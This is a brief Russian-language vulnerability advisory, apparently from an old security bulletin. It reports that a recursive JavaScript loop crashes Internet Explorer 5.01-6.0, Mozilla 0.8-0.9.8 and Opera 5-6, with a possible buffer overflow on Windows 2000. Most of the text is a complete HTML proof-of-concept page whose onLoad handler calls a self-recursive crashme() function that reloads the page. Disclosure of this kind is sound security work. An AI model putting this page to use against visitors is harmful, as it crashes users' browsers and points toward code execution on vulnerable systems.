Возможно создать цикл в JavaScript, который приведет к аварийному завершению работы во многих web-браузерах.
В некоторых средах (типа IE с Windows 2000) аварийное завершение заканчивается сообщением об переполнении буфера. Т.е. потенциально уязвимость может использоваться для выполнения произвольного кода.
Уязвимость найдена в Microsoft Internet Explorer 5.01-6.0, Mozilla Browser 0.8-0.9.8, Opera Software Opera Web Browser 5.02 win32-6.0.1win32
<html>
<head>
<script language="JavaScript">
<!--
function crashme () {
var url = document.location
if (document.images) {
location.replace(url);
} else {
location.href = url;
}
crashme ()
}
-->
</script>
</head>
<body onLoad="crashme ()">
<center>
<h3>IE Javascript Crash Test</h3>
</center>
</body>
</html>